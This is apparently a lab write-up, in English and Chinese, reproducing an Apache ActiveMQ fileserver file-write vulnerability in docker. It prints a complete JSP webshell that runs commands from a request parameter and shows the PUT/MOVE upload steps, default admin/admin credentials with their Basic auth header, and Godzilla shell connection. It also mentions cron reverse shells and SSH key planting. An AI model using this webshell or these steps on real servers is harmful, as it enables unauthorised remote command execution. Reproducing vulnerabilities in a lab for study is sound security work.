1. Vulnerability Details
Affected version: Apache ActiveMQ 5.x~5.14.0
Vulnerability principle: The fileserver interface for storing files in ActiveMQ supports writing files, but has no execution permission. Files can be written and accessed by MOVE files to other executable directories.
In versions 5.12.x~5.13.x, ActiveMQ disables the fileserver application by default (but it can be enabled in conf/jetty.xml); after version 5.14.0, the fileserver application is completely deleted.
2. Recurrence process
Build a docker environment
docker-compose up -d
Access port 8161
Default account password admin/admin login
write webshell file
A successful file upload requires the following prerequisites:
Know the absolute path of the file upload
The website has a file upload function
File types are not restricted
Uploaded files can be executed
The absolute path of ActiveMQ can be obtained through http://your-ip:8161/admin/test/systemProperties.jsp page
I found a jsp Trojan horse on the Internet
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
Use bp to capture and upload, you can see that the upload is successful
Visit http://192.168.239.128:8161/fileserver/1.jsp, the file is written but not executed
MOVE the file to the executable directory
Use MOVE to move the Trojan file to api or admin. I moved it to the admin directory.
ActiveMQ's web console is divided into three applications, admin, api and fileserver, where admin is the administrator page, api is the interface, and fileserver is the interface for storing files
access files
http://192.168.239.128:8161/admin/1.jsp?cmd=ls
http://192.168.239.128:8161/admin/1.jsp?cmd=whoami
(Another) Use Godzilla to generate a Trojan and connect
使用哥斯拉生成jsp木马文件,将文件PUT至fileserver接口中,返回204,也上传成功了
MOVE文件
用哥斯拉进行连接
URL=http://192.168.239.128:8161/admin/1.jsp
注意有效载荷和加密器的选择
因为上述的操作需要admin管理员的登录,所以我们需要在请求配置中加上认证头
Authorization: Basic YWRtaW46YWRtaW4=
测试连接,连接成功
三、总结
MOVE方法还是具有很大危险性的,慎用!
任意文件写入还有其他的思路:
写入webshell(修改jetty.xml只是为写入webshell排除掉admin和api需要登录的前提条件)
写入cron文件(定时反弹shell)
写入ssh key
在此献上大佬的文章,对手上述三种方法针对改漏洞都做出了详细过程的讲解
https://www.freebuf.com/vuls/274088.html
身为小白的我还需要继续深造阿。。。